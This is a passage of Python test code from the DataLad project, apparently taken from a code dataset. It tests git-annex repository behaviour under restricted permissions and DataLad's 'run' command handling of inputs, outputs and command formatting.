system\n # after you ran sudo command recently.\n run = Runner().run\n sudochown = lambda cmd: run(['sudo', '-n', 'chown'] + cmd)\n\n repo = AnnexRepo(op.join(path, 'repo'), init=True)\n repo.add('file1')\n repo.commit()\n\n # make a clone\n repo2 = repo.clone(repo.path, op.join(path, 'clone'))\n repo2.get('file1')\n\n # progress forward original repo and fetch (but nothing else) it into repo2\n repo.add('file2')\n repo.commit()\n repo2.fetch(DEFAULT_REMOTE)\n\n # Assure that regardless of umask everyone could read it all\n run(['chmod', '-R', 'a+rX', repo2.path])\n try:\n # To assure that git/git-annex really cannot acquire a lock and do\n # any changes (e.g. merge git-annex branch), we make this repo owned by root\n sudochown(['-R', 'root', repo2.path])\n except Exception as exc:\n # Exception could be CommandError or IOError when there is no sudo\n raise SkipTest(\"Cannot run sudo chown non-interactively: %s\" % exc)\n\n # recent git would refuse to run git status in repository owned by someone else\n # which could lead to odd git-annex errors before 10.20220504-55-gaf0d85446 AKA 10.20220525~13\n # see https://github.com/datalad/datalad/issues/5665 and after an informative error\n # https://github.com/datalad/datalad/issues/6708\n # To overcome - explicitly add the path into allowed\n dl_cfg.add('safe.directory', repo2.path, scope='global')\n\n try:\n assert not repo2.get('file1') # should work since file is here already\n repo2.status() # should be Ok as well\n # and we should get info on the file just fine\n assert repo2.info('file1')\n # The tricky part is the repo_info which might need to update\n # remotes UUID -- by default it should fail!\n # Oh well -- not raised on travis... whatever for now\n #with assert_raises(CommandError):\n # repo2.repo_info()\n # but should succeed if we disallow merges\n repo2.repo_info(merge_annex_branches=False)\n # and ultimately the ls which uses it\n try:\n from datalad.api import ls\n ls(repo2.path, all_=True, long_=True)\n except ImportError:\n raise SkipTest(\n \"No `ls` command available (provided by -deprecated extension)\")\n finally:\n sudochown(['-R', str(os.geteuid()), repo2.path])\n\n # just check that all is good again\n repo2.repo_info()\n\n\n@skip_if_on_windows\n@skip_if_root\n@with_tree({\n 'file1': 'file1',\n})\ndef test_save_noperms(path=None):\n # check that we do report annex error messages\n\n # This test would function only if there is a way to run sudo\n # non-interactively, e.g. on Travis or on your local (watchout!) system\n # after you ran sudo command recently.\n repo = AnnexRepo(path, init=True)\n\n run = Runner().run\n sudochown = lambda cmd: run(['sudo', '-n', 'chown'] + cmd)\n\n try:\n # To assure that git/git-annex really cannot acquire a lock and do\n # any changes (e.g. 
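# --- Editor's illustrative aside, not part of the original test suite. ---
# The read-only query pattern from the test above, condensed.  `repo` is a
# hypothetical AnnexRepo whose .git directory the current user cannot write
# to, with an already annexed 'file1'.
def _demo_readonly_queries(repo):
    # plain queries do not need write access ...
    repo.status()
    repo.info('file1')
    # ... and repo_info() can be told not to merge remote git-annex branches,
    # which would otherwise require modifying the local repository
    repo.repo_info(merge_annex_branches=False)
# --- end of aside ---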
merge git-annex branch), we make this repo owned by root\n sudochown(['-R', 'root:root', str(repo.pathobj / 'file1')])\n except Exception as exc:\n # Exception could be CommandError or IOError when there is no sudo\n raise SkipTest(\"Cannot run sudo chown non-interactively: %s\" % exc)\n\n try:\n repo.save(paths=['file1'])\n except CommandError as exc:\n res = exc.kwargs[\"stdout_json\"]\n assert_result_count(res, 1)\n assert_result_count(res, 1, file='file1',\n command='add', success=False)\n assert_in('permission denied', res[0]['error-messages'][0])\n finally:\n sudochown(['-R', str(os.geteuid()), repo.path])\n\n\ndef test_get_size_from_key():\n\n # see https://git-annex.branchable.com/internals/key_format/\n # BACKEND[-sNNNN][-mNNNN][-SNNNN-CNNNN]--NAME\n\n test_keys = {\"ANYBACKEND--NAME\": None,\n \"ANYBACKEND-s123-m1234--NAME-WITH-DASHES.ext\": 123,\n \"MD5E-s100-S10-C1--somen.ame\": 10,\n \"SHA256-s99-S10-C10--name\": 9,\n \"SHA256E-sNaN--name\": None, # debatable: None or raise?\n }\n\n invalid = [\"ANYBACKEND-S10-C30--missing-total\",\n \"s99-S10-C10--NOBACKEND\",\n \"MD5-s100-S5--no-chunk-number\"]\n\n for key in invalid:\n assert_raises(ValueError, AnnexRepo.get_size_from_key, key)\n\n for key, value in test_keys.items():\n eq_(AnnexRepo.get_size_from_key(key), value)\n\n\n@with_tempfile(mkdir=True)\ndef test_call_annex(path=None):\n ar = AnnexRepo(path, create=True)\n # we raise on mistakes\n with assert_raises(CommandError):\n ar._call_annex(['not-an-annex-command'])\n # and we get to know why\n try:\n ar._call_annex(['not-an-annex-command'])\n except CommandError as e:\n assert_in('Invalid argument', e.stderr)\n\n\n@with_tempfile\ndef test_whereis_zero_copies(path=None):\n repo = AnnexRepo(path, create=True)\n (repo.pathobj / \"foo\").write_text(\"foo\")\n repo.save()\n repo.drop([\"foo\"], options=[\"--force\"])\n\n for output in \"full\", \"uuids\", \"descriptions\":\n res = repo.whereis(files=[\"foo\"], output=output)\n if output == \"full\":\n assert_equal(res[\"foo\"], {})\n else:\n assert_equal(res, [[]])\n\n\n@with_tempfile(mkdir=True)\ndef test_whereis_batch_eqv(path=None):\n path = Path(path)\n\n repo_a = AnnexRepo(path / \"a\", create=True)\n (repo_a.pathobj / \"foo\").write_text(\"foo\")\n (repo_a.pathobj / \"bar\").write_text(\"bar\")\n (repo_a.pathobj / \"baz\").write_text(\"baz\")\n repo_a.save()\n\n repo_b = repo_a.clone(repo_a.path, str(path / \"b\"))\n repo_b.drop([\"bar\"])\n repo_b.drop([\"baz\"])\n repo_b.drop([\"baz\"], options=[\"--from=\" + DEFAULT_REMOTE, \"--force\"])\n\n files = [\"foo\", \"bar\", \"baz\"]\n info = repo_b.get_content_annexinfo(files)\n keys = [info[repo_b.pathobj / f]['key'] for f in files]\n\n for output in \"full\", \"uuids\", \"descriptions\":\n out_non_batch = repo_b.whereis(files=files, batch=False, output=output)\n assert_equal(out_non_batch,\n repo_b.whereis(files=files, batch=True, output=output))\n out_non_batch_keys = repo_b.whereis(files=keys, batch=False, key=True, output=output)\n # should be identical\n if output == 'full':\n # we need to map files to keys though\n assert_equal(out_non_batch_keys,\n {k: out_non_batch[f] for f, k in zip(files, keys)})\n else:\n assert_equal(out_non_batch, out_non_batch_keys)\n\n if external_versions['cmd:annex'] >= '8.20210903':\n # --batch-keys support was introduced\n assert_equal(out_non_batch_keys,\n repo_b.whereis(files=keys, batch=True, key=True, output=output))\n\n if external_versions['cmd:annex'] < '8.20210903':\n # --key= and --batch are incompatible.\n with 
assert_raises(ValueError):\n repo_b.whereis(files=files, batch=True, key=True)\n\n\ndef test_done_deprecation():\n with unittest.mock.patch(\"datalad.cmd.warnings.warn\") as warn_mock:\n _ = AnnexJsonProtocol(\"done\")\n warn_mock.assert_called_once()\n\n with unittest.mock.patch(\"datalad.cmd.warnings.warn\") as warn_mock:\n _ = AnnexJsonProtocol()\n warn_mock.assert_not_called()\n\n\ndef test_generator_annex_json_protocol():\n\n runner = Runner()\n stdin_queue = Queue()\n\n def json_object(count: int):\n json_template = '{{\"id\": \"some-id\", \"count\": {count}}}'\n return json_template.format(count=count).encode()\n\n count = 123\n stdin_queue.put(json_object(count=count))\n for result in runner.run(cmd=\"cat\", protocol=GeneratorAnnexJsonProtocol, stdin=stdin_queue):\n assert_equal(\n result,\n {\n \"id\": \"some-id\",\n \"count\": count,\n }\n )\n if count == 133:\n break\n count += 1\n stdin_queue.put(json_object(count=count))\n\n\ndef test_captured_exception():\n class RaiseMock:\n def add_(self, *args, **kwargs):\n raise CommandError(\"RaiseMock.add_\")\n\n with patch(\"datalad.support.annexrepo.super\") as repl_super:\n repl_super.return_value = RaiseMock()\n gen = AnnexRepo.add_(object(), [])\n assert_raises(CommandError, gen.send, None)\n\n\n@skip_if_on_windows\ndef test_stderr_rejecting_protocol_trigger():\n result_generator = GitWitlessRunner().run(\n \"echo ssss >&2\",\n protocol=GeneratorAnnexJsonNoStderrProtocol)\n\n try:\n tuple(result_generator)\n except CommandError as e:\n assert_in(\"ssss\", e.stderr)\n return\n assert_true(False)\n\n\n@skip_if_on_windows\ndef test_stderr_rejecting_protocol_ignore():\n\n result_generator = GitWitlessRunner().run(\n ['echo', '{\"status\": \"ok\"}'],\n protocol=GeneratorAnnexJsonNoStderrProtocol)\n assert_equal(tuple(result_generator), ({\"status\": \"ok\"},))\n" }, { "alpha_fraction": 0.5895057320594788, "alphanum_fraction": 0.5954243540763855, "avg_line_length": 35.899105072021484, "blob_id": "0c0324fc2efc74b88aa06935287c2e8f28e45e41", "content_id": "e73e9ac1f607cc14a9753b16651843ae16b409f6", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 28900, "license_type": "permissive", "max_line_length": 209, "num_lines": 783, "path": "/datalad/core/local/tests/test_run.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-; coding: utf-8 -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Partial testing of `run` commands.\n\nNote: Tests of `run` that involve `rerun` are in interface.tests.test_run.\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nimport logging\nimport os\nimport os.path as op\nimport sys\nfrom os import (\n mkdir,\n remove,\n)\nfrom unittest.mock import patch\n\nfrom datalad.api import (\n clone,\n run,\n)\nfrom datalad.cli.main import main\nfrom datalad.core.local.run import (\n _format_iospecs,\n _get_substitutions,\n format_command,\n run_command,\n)\nfrom datalad.distribution.dataset import Dataset\nfrom datalad.support.exceptions import (\n CommandError,\n IncompleteResultsError,\n NoDatasetFound,\n)\nfrom datalad.tests.utils_pytest import (\n DEFAULT_BRANCH,\n OBSCURE_FILENAME,\n 
assert_false,\n assert_in,\n assert_in_results,\n assert_not_in,\n assert_not_in_results,\n assert_raises,\n assert_repo_status,\n assert_result_count,\n assert_status,\n create_tree,\n eq_,\n known_failure_windows,\n neq_,\n ok_,\n ok_exists,\n ok_file_has_content,\n patch_config,\n swallow_logs,\n swallow_outputs,\n with_tempfile,\n with_tree,\n)\nfrom datalad.utils import (\n chpwd,\n ensure_unicode,\n on_windows,\n)\n\ncat_command = 'cat' if not on_windows else 'type'\n\n\n@with_tempfile(mkdir=True)\ndef test_invalid_call(path=None):\n with chpwd(path):\n # no dataset, no luck\n assert_raises(NoDatasetFound, run, 'doesntmatter')\n # dirty dataset\n ds = Dataset(path).create()\n create_tree(ds.path, {'this': 'dirty'})\n assert_status('impossible', run('doesntmatter', on_failure='ignore'))\n\n\ndef last_commit_msg(repo):\n # ATTN: Pass branch explicitly so that this check works when we're on an\n # adjusted branch too (e.g., when this test is executed under Windows).\n return repo.format_commit(\"%B\", DEFAULT_BRANCH)\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_basics(path=None, nodspath=None):\n ds = Dataset(path).create()\n last_state = ds.repo.get_hexsha()\n # run inside the dataset\n with chpwd(path), \\\n swallow_outputs():\n # provoke command failure\n res = ds.run('7i3amhmuch9invalid', on_failure=\"ignore\",\n result_renderer=None)\n assert_result_count(res, 1, action=\"run\", status=\"error\")\n run_res = [r for r in res if r[\"action\"] == \"run\"][0]\n # let's not speculate that the exit code is always 127\n ok_(run_res[\"run_info\"][\"exit\"] > 0)\n eq_(last_state, ds.repo.get_hexsha())\n # now one that must work\n res = ds.run('cd .> empty', message='TEST')\n assert_repo_status(ds.path)\n assert_result_count(res, 3)\n # TODO 'state' is still untracked!!!\n assert_result_count(res, 1, action='add',\n path=op.join(ds.path, 'empty'), type='file')\n assert_result_count(res, 1, action='save', path=ds.path)\n commit_msg = last_commit_msg(ds.repo)\n ok_(commit_msg.startswith('[DATALAD RUNCMD] TEST'))\n # crude test that we have a record for the PWD\n assert_in('\"pwd\": \".\"', commit_msg)\n last_state = ds.repo.get_hexsha()\n # now run a command that will not alter the dataset\n noop_cmd = ':'\n res = ds.run(noop_cmd, message='NOOP_TEST')\n assert_result_count(res, 1, action='save', status='notneeded')\n eq_(last_state, ds.repo.get_hexsha())\n # We can also run the command via a single-item list because this is\n # what the CLI interface passes in for quoted commands.\n res = ds.run([noop_cmd], message='NOOP_TEST')\n assert_result_count(res, 1, action='save', status='notneeded')\n\n # run outside the dataset, should still work but with limitations\n with chpwd(nodspath), \\\n swallow_outputs():\n res = ds.run('cd . 
> empty2', message='TEST')\n assert_result_count(res, 1, action='add',\n path=op.join(ds.path, 'empty2'),\n type='file', status='ok')\n assert_result_count(res, 1, action='save', status='ok')\n\n # running without a command is a noop\n with chpwd(path):\n with swallow_logs(new_level=logging.WARN) as cml:\n ds.run()\n assert_in(\"No command given\", cml.out)\n\n # running without a command is a noop\n with chpwd(path):\n with swallow_logs(new_level=logging.INFO) as cml:\n assert_raises(\n IncompleteResultsError,\n ds.run,\n '7i3amhmuch9invalid',\n # this is on_failure=stop by default\n )\n # must give recovery hint in Python notation\n assert_in(\"can save the changes with \\\"Dataset(\", cml.out)\n\n with chpwd(path):\n # make sure that an invalid input declaration prevents command\n # execution by default\n assert_raises(\n IncompleteResultsError,\n ds.run, 'cd .> dummy0', inputs=['not-here'])\n ok_(not (ds.pathobj / 'dummy0').exists())\n # but the default behavior can be changed\n assert_raises(\n IncompleteResultsError,\n ds.run, 'cd .> dummy0', inputs=['not-here'],\n on_failure='continue')\n # it has stilled failed, but the command got executed nevertheless\n ok_((ds.pathobj / 'dummy0').exists())\n\n\n@known_failure_windows\n# ^ For an unknown reason, appveyor started failing after we removed\n# receive.autogc=0 and gc.auto=0 from our common git options (gh-3482).\n# moreover the usage of unicode in the file names also breaks this on windows\n@with_tempfile(mkdir=True)\ndef test_py2_unicode_command(path=None):\n # Avoid OBSCURE_FILENAME to avoid windows-breakage (gh-2929).\n ds = Dataset(path).create()\n touch_cmd = \"import sys; open(sys.argv[1], 'w').write('')\"\n cmd_str = u\"{} -c \\\"{}\\\" {}\".format(sys.executable,\n touch_cmd,\n u\"bβ0.dat\")\n ds.run(cmd_str)\n assert_repo_status(ds.path)\n ok_exists(op.join(path, u\"bβ0.dat\"))\n\n # somewhat desperate attempt to detect our own Github CI tests on a\n # crippled filesystem (VFAT) that is so crippled that it doesn't handle\n # what is needed here. 
It just goes mad with encoded bytestrings:\n # CommandError: ''python -c '\"'\"'import sys; open(sys.argv[1], '\"'\"'\"'\"'\"'\"'\"'\"'w'\"'\"'\"'\"'\"'\"'\"'\"').write('\"'\"'\"'\"'\"'\"'\"'\"''\"'\"'\"'\"'\"'\"'\"'\"')'\"'\"' '\"'\"' β1 '\"'\"''' failed with exitcode 1 under /crippledfs/\n if not on_windows and os.environ.get('TMPDIR', None) != '/crippledfs': # FIXME\n ds.run([sys.executable, \"-c\", touch_cmd, u\"bβ1.dat\"])\n assert_repo_status(ds.path)\n ok_exists(op.join(path, u\"bβ1.dat\"))\n\n # Send in a list of byte-strings to mimic a py2 command-line\n # invocation.\n ds.run([s.encode(\"utf-8\")\n for s in [sys.executable, \"-c\", touch_cmd, u\" β1 \"]])\n assert_repo_status(ds.path)\n ok_exists(op.join(path, u\" β1 \"))\n\n assert_in_results(\n ds.run(u\"bβ2.dat\", result_renderer=None, on_failure=\"ignore\"),\n status=\"error\", action=\"run\")\n\n\n@with_tempfile(mkdir=True)\ndef test_sidecar(path=None):\n ds = Dataset(path).create()\n # Simple sidecar message checks.\n ds.run(\"cd .> dummy0\", message=\"sidecar arg\", sidecar=True)\n assert_not_in('\"cmd\":', ds.repo.format_commit(\"%B\"))\n\n ds.config.set(\"datalad.run.record-sidecar\", \"false\", scope=\"local\")\n ds.run(\"cd .> dummy1\", message=\"sidecar config\")\n\n assert_in('\"cmd\":', last_commit_msg(ds.repo))\n\n ds.config.set(\"datalad.run.record-sidecar\", \"true\", scope=\"local\")\n ds.run(\"cd .> dummy2\", message=\"sidecar config\")\n assert_not_in('\"cmd\":', last_commit_msg(ds.repo))\n\n # Don't break when config.get() returns multiple values. Here it's two\n # values in .gitconfig, but a more realistic scenario is a value in\n # $repo/.git/config that overrides a setting in ~/.config/git/config.\n ds.config.add(\"datalad.run.record-sidecar\", \"false\", scope=\"local\")\n ds.run(\"cd .> dummy3\", message=\"sidecar config\")\n assert_in('\"cmd\":', last_commit_msg(ds.repo))\n\n\n # make sure sidecar file is committed when explicitly specifying outputs\n ds.run(\"cd .> dummy4\",\n outputs=[\"dummy4\"],\n sidecar=True,\n explicit=True,\n message=\"sidecar + specified outputs\")\n assert_not_in('\"cmd\":', last_commit_msg(ds.repo))\n assert_repo_status(ds.path)\n\n\n\n\n@with_tree(tree={\"to_remove\": \"abc\"})\ndef test_run_save_deletion(path=None):\n ds = Dataset(path).create(force=True)\n ds.save()\n ds.run(\"{} to_remove\".format(\"del\" if on_windows else \"rm\"))\n assert_repo_status(ds.path)\n\n\n@with_tempfile(mkdir=True)\ndef test_run_from_subds(path=None):\n subds = Dataset(path).create().create(\"sub\")\n subds.run(\"cd .> foo\")\n assert_repo_status(subds.path)\n\n\n@with_tree(tree={\"sub\": {\"input\": \"\"}})\ndef test_run_from_subds_gh3551(path=None):\n ds = Dataset(path).create(force=True)\n ds.save()\n ds.create(\"output\")\n with chpwd(op.join(ds.path, \"sub\")):\n assert_in_results(\n run(\"echo\",\n inputs=[op.join(op.pardir, \"sub\", \"input\")],\n outputs=[op.join(op.pardir, \"output\")],\n return_type=\"list\", result_filter=None, result_xfm=None),\n action=\"get\",\n status=\"notneeded\")\n assert_repo_status(ds.path)\n\n subds_path = op.join(\"output\", \"subds\")\n ds.create(subds_path)\n with chpwd(op.join(ds.path, \"sub\")):\n output_dir = op.join(op.pardir, \"output\", \"subds\")\n # The below command is trying to be compatible. 
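# --- Editor's illustrative aside, not part of the original test suite. ---
# A hedged sketch of the core `run` pattern exercised in this module:
# declared inputs are retrieved and pre-existing outputs unlocked before the
# command runs, and {inputs}/{outputs} placeholders are substituted from those
# specs.  The directory, file names and the POSIX `cat` command are assumptions.
def _demo_run_with_io(workdir):
    from datalad.distribution.dataset import Dataset
    ds = Dataset(workdir).create()
    (ds.pathobj / 'in.txt').write_text('hello')
    ds.save(message='add input')
    # optionally keep the (potentially long) run record in a sidecar file
    ds.config.set('datalad.run.record-sidecar', 'true', scope='local')
    ds.run('cat {inputs} > {outputs}',
           inputs=['in.txt'], outputs=['out.txt'],
           message='derive out.txt from in.txt')
# --- end of aside ---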
It could be made better\n # (e.g., actually using the input file) by someone that knows something\n # about Windows.\n assert_in_results(\n run(\"cd .> {}\".format(op.join(output_dir, \"f\")),\n inputs=[op.join(op.pardir, \"sub\", \"input\")],\n outputs=[output_dir],\n return_type=\"list\", result_filter=None, result_xfm=None),\n action=\"save\",\n status=\"ok\")\n assert_repo_status(ds.path)\n subds = Dataset(op.join(ds.path, subds_path))\n ok_exists(op.join(subds.path, \"f\"))\n if not ds.repo.is_managed_branch(): # FIXME\n # This check fails on Windows:\n # https://github.com/datalad/datalad/pull/3747/checks?check_run_id=248506560#step:8:254\n ok_(subds.repo.file_has_content(\"f\"))\n\n\n@with_tempfile(mkdir=True)\ndef test_run_assume_ready(path=None):\n ds = Dataset(path).create()\n repo = ds.repo\n adjusted = repo.is_managed_branch()\n\n # --assume-ready=inputs\n\n (repo.pathobj / \"f1\").write_text(\"f1\")\n ds.save()\n\n def cat_cmd(fname):\n return [sys.executable, \"-c\",\n \"import sys; print(open(sys.argv[-1]).read())\",\n fname]\n\n assert_in_results(\n ds.run(cat_cmd(\"f1\"), inputs=[\"f1\"]),\n action=\"get\", type=\"file\")\n # Same thing, but without the get() call.\n assert_not_in_results(\n ds.run(cat_cmd(\"f1\"), inputs=[\"f1\"], assume_ready=\"inputs\"),\n action=\"get\", type=\"file\")\n\n ds.drop(\"f1\", reckless='kill')\n if not adjusted:\n # If the input is not actually ready, the command will fail.\n assert_in_results(\n ds.run(cat_cmd(\"f1\"), inputs=[\"f1\"], assume_ready=\"inputs\",\n on_failure=\"ignore\", result_renderer=None),\n action=\"run\", status=\"error\")\n\n # --assume-ready=outputs\n\n def unlink_and_write_cmd(fname):\n # This command doesn't care whether the output file is unlocked because\n # it removes it ahead of time anyway.\n return [sys.executable, \"-c\",\n \"import sys; import os; import os.path as op; \"\n \"f = sys.argv[-1]; op.lexists(f) and os.unlink(f); \"\n \"open(f, mode='w').write(str(sys.argv))\",\n fname]\n\n (repo.pathobj / \"f2\").write_text(\"f2\")\n ds.save()\n\n res = ds.run(unlink_and_write_cmd(\"f2\"), outputs=[\"f2\"])\n if not adjusted:\n assert_in_results(res, action=\"unlock\", type=\"file\")\n # Same thing, but without the unlock() call.\n res = ds.run(unlink_and_write_cmd(\"f2\"), outputs=[\"f2\"],\n assume_ready=\"outputs\")\n assert_not_in_results(res, action=\"unlock\", type=\"file\")\n\n # --assume-ready=both\n\n res = ds.run(unlink_and_write_cmd(\"f2\"),\n outputs=[\"f2\"], inputs=[\"f2\"])\n assert_in_results(res, action=\"get\", type=\"file\")\n if not adjusted:\n assert_in_results(res, action=\"unlock\", type=\"file\")\n\n res = ds.run(unlink_and_write_cmd(\"f2\"),\n outputs=[\"f2\"], inputs=[\"f2\"],\n assume_ready=\"both\")\n assert_not_in_results(res, action=\"get\", type=\"file\")\n assert_not_in_results(res, action=\"unlock\", type=\"file\")\n\n\n@with_tempfile()\n@with_tempfile()\ndef test_run_explicit(origpath=None, path=None):\n origds = Dataset(origpath).create()\n (origds.pathobj / \"test-annex.dat\").write_text('content')\n origds.save()\n ds = clone(origpath, path)\n\n assert_false(ds.repo.file_has_content(\"test-annex.dat\"))\n\n create_tree(ds.path, {\"dirt_untracked\": \"untracked\",\n \"dirt_modified\": \"modified\"})\n ds.save(\"dirt_modified\", to_git=True)\n with open(op.join(path, \"dirt_modified\"), \"a\") as ofh:\n ofh.write(\", more\")\n\n # We need explicit=True to run with dirty repo.\n assert_status(\n \"impossible\",\n ds.run(f\"{cat_command} test-annex.dat test-annex.dat 
>doubled.dat\",\n inputs=[\"test-annex.dat\"],\n on_failure=\"ignore\"))\n\n hexsha_initial = ds.repo.get_hexsha()\n # If we specify test-annex.dat as an input, it will be retrieved before the\n # run.\n ds.run(f\"{cat_command} test-annex.dat test-annex.dat >doubled.dat\",\n inputs=[\"test-annex.dat\"], explicit=True,\n result_renderer='disabled')\n ok_(ds.repo.file_has_content(\"test-annex.dat\"))\n # We didn't commit anything because outputs weren't specified.\n assert_false(ds.repo.file_has_content(\"doubled.dat\"))\n eq_(hexsha_initial, ds.repo.get_hexsha())\n\n # If an input doesn't exist, we just show the standard warning.\n with assert_raises(IncompleteResultsError):\n ds.run(\"ls\", inputs=[\"not-there\"], explicit=True,\n on_failure=\"stop\", result_renderer='disabled')\n\n remove(op.join(path, \"doubled.dat\"))\n\n hexsha_initial = ds.repo.get_hexsha()\n ds.run(f\"{cat_command} test-annex.dat test-annex.dat >doubled.dat\",\n inputs=[\"test-annex.dat\"], outputs=[\"doubled.dat\"],\n explicit=True, result_renderer='disabled')\n ok_(ds.repo.file_has_content(\"doubled.dat\"))\n assert_repo_status(ds.path, modified=[\"dirt_modified\"],\n untracked=['dirt_untracked'])\n neq_(hexsha_initial, ds.repo.get_hexsha())\n\n # Saving explicit outputs works from subdirectories.\n subdir = op.join(path, \"subdir\")\n mkdir(subdir)\n with chpwd(subdir):\n run(\"echo insubdir >foo\", explicit=True, outputs=[\"foo\"],\n result_renderer='disabled')\n ok_(ds.repo.file_has_content(op.join(\"subdir\", \"foo\")))\n\n\n@with_tree(tree={OBSCURE_FILENAME + u\".t\": \"obscure\",\n \"bar.txt\": \"b\",\n \"foo blah.txt\": \"f\"})\ndef test_inputs_quotes_needed(path=None):\n ds = Dataset(path).create(force=True)\n ds.save()\n cmd = \"import sys; open(sys.argv[-1], 'w').write('!'.join(sys.argv[1:]))\"\n # The string form of a command works fine when the inputs/outputs have\n # spaces ...\n cmd_str = \"{} -c \\\"{}\\\" {{inputs}} {{outputs[0]}}\".format(\n sys.executable, cmd)\n ds.run(cmd_str, inputs=[\"*.t*\"], outputs=[\"out0\"], expand=\"inputs\")\n expected = u\"!\".join(\n list(sorted([OBSCURE_FILENAME + u\".t\", \"bar.txt\", \"foo blah.txt\"])) +\n [\"out0\"])\n with open(op.join(path, \"out0\")) as ifh:\n eq_(ensure_unicode(ifh.read()), expected)\n # ... but the list form of a command does not. 
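# --- Editor's illustrative aside, not part of the original test suite. ---
# The string-vs-list distinction discussed above, condensed.  `ds` is a
# hypothetical clean dataset containing annexed *.txt files, and the POSIX
# `ls` command is an assumption used only for illustration.
def _demo_placeholder_forms(ds):
    # string form: the command goes through a shell and {inputs} is replaced
    # by the (quoted) glob matches, so names with spaces survive
    ds.run('ls {inputs}', inputs=['*.txt'], expand='inputs')
    # list form: '{inputs}' is substituted with space-joined matches and no
    # extra quoting, which is fine only for names without spaces
    ds.run(['ls', '{inputs}'], inputs=['*.txt'])
# --- end of aside ---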
(Don't test this failure\n # with the obscure file name because we'd need to know its composition to\n # predict the failure.)\n cmd_list = [sys.executable, \"-c\", cmd, \"{inputs}\", \"{outputs[0]}\"]\n ds.run(cmd_list, inputs=[\"*.txt\"], outputs=[\"out0\"])\n ok_file_has_content(op.join(path, \"out0\"), \"bar.txt foo!blah.txt!out0\")\n\n\n@with_tree(tree={\"foo\": \"f\", \"bar\": \"b\"})\ndef test_inject(path=None):\n ds = Dataset(path).create(force=True)\n assert_repo_status(ds.path, untracked=['foo', 'bar'])\n list(run_command(\"nonsense command\",\n dataset=ds,\n inject=True,\n extra_info={\"custom_key\": \"custom_field\"}))\n msg = last_commit_msg(ds.repo)\n assert_in(\"custom_key\", msg)\n assert_in(\"nonsense command\", msg)\n\n\n@with_tempfile(mkdir=True)\ndef test_format_command_strip_leading_dashes(path=None):\n ds = Dataset(path).create()\n eq_(format_command(ds, [\"--\", \"cmd\", \"--opt\"]),\n '\"cmd\" \"--opt\"' if on_windows else \"cmd --opt\")\n eq_(format_command(ds, [\"--\"]), \"\")\n # Can repeat to escape.\n eq_(format_command(ds, [\"--\", \"--\", \"ok\"]),\n '\"--\" \"ok\"' if on_windows else \"-- ok\")\n # String stays as is.\n eq_(format_command(ds, \"--\"), \"--\")\n\n\n@with_tempfile(mkdir=True)\ndef test_run_cmdline_disambiguation(path=None):\n Dataset(path).create()\n with chpwd(path):\n # Without a positional argument starting a command, any option is\n # treated as an option to 'datalad run'.\n with swallow_outputs() as cmo:\n with patch(\"datalad.core.local.run._execute_command\") as exec_cmd:\n with assert_raises(SystemExit):\n main([\"datalad\", \"run\", \"--message\"])\n exec_cmd.assert_not_called()\n assert_in(\"message: expected one\", cmo.err)\n # If we want to pass an option as the first value of a command (e.g.,\n # because we are using a runscript with containers-run), we can do this\n # with \"--\".\n with patch(\"datalad.core.local.run._execute_command\") as exec_cmd:\n with assert_raises(SystemExit):\n main([\"datalad\", \"run\", \"--\", \"--message\"])\n exec_cmd.assert_called_once_with(\n '\"--message\"' if on_windows else \"--message\",\n path)\n\n # Our parser used to mishandle --version (gh-3067),\n # treating 'datalad run CMD --version' as 'datalad --version'.\n # but that is no longer the case and echo --version should work with or\n # without explicit \"--\" separator\n for sep in [[], ['--']]:\n with patch(\"datalad.core.local.run._execute_command\") as exec_cmd:\n with assert_raises(SystemExit):\n main([\"datalad\", \"run\"] + sep + [\"echo\", \"--version\"])\n exec_cmd.assert_called_once_with(\n '\"echo\" \"--version\"' if on_windows else \"echo --version\",\n path)\n\n\n@with_tempfile(mkdir=True)\ndef test_run_path_semantics(path=None):\n # Test that we follow path resolution from gh-3435: paths are relative to\n # dataset if a dataset instance is given and relative to the current\n # working directory otherwise.\n\n ds0 = Dataset(op.join(path, \"ds0\")).create()\n ds0_subdir = op.join(ds0.path, \"s0\")\n os.mkdir(ds0_subdir)\n\n # Although not useful, we can specify `dataset` as a string that lines up\n # with the one from the current directory.\n with chpwd(ds0_subdir):\n run(\"cd .> one\", dataset=\"..\")\n run(\"cd .> one\", outputs=[\"one\"], dataset=ds0.path)\n ok_exists(op.join(ds0_subdir, \"one\"))\n assert_repo_status(ds0.path)\n\n # Specify string dataset argument, running from another dataset ...\n\n ds1 = Dataset(op.join(path, \"ds1\")).create()\n ds1_subdir = op.join(ds1.path, \"s1\")\n os.mkdir(ds1_subdir)\n\n # ... 
producing output file in specified dataset\n with chpwd(ds1_subdir):\n run(\"cd .> {}\".format(op.join(ds0.path, \"two\")),\n dataset=ds0.path)\n ok_exists(op.join(ds0.path, \"two\"))\n assert_repo_status(ds0.path)\n\n # ... producing output file in specified dataset and passing output file as\n # relative to current directory\n with chpwd(ds1_subdir):\n out = op.join(ds0.path, \"three\")\n run(\"cd .> {}\".format(out), dataset=ds0.path, explicit=True,\n outputs=[op.relpath(out, ds1_subdir)])\n ok_exists(op.join(ds0.path, \"three\"))\n assert_repo_status(ds0.path)\n\n # ... producing output file outside of specified dataset, leaving it\n # untracked in the other dataset\n assert_repo_status(ds1.path)\n with chpwd(ds1_subdir):\n run(\"cd .> four\", dataset=ds0.path)\n assert_repo_status(ds1.path, untracked=[ds1_subdir])\n\n # If we repeat above with an instance instead of the string, the directory\n # for the run is the specified dataset.\n with chpwd(ds1_subdir):\n run(\"cd .> five\", dataset=ds0)\n ok_exists(op.join(ds0.path, \"five\"))\n assert_repo_status(ds0.path)\n\n\n@with_tempfile(mkdir=True)\ndef test_run_remove_keeps_leading_directory(path=None):\n ds = Dataset(op.join(path, \"ds\")).create()\n repo = ds.repo\n\n (ds.pathobj / \"d\").mkdir()\n output = (ds.pathobj / \"d\" / \"foo\")\n output.write_text(\"foo\")\n ds.save()\n\n output_rel = str(output.relative_to(ds.pathobj))\n repo.drop(output_rel, 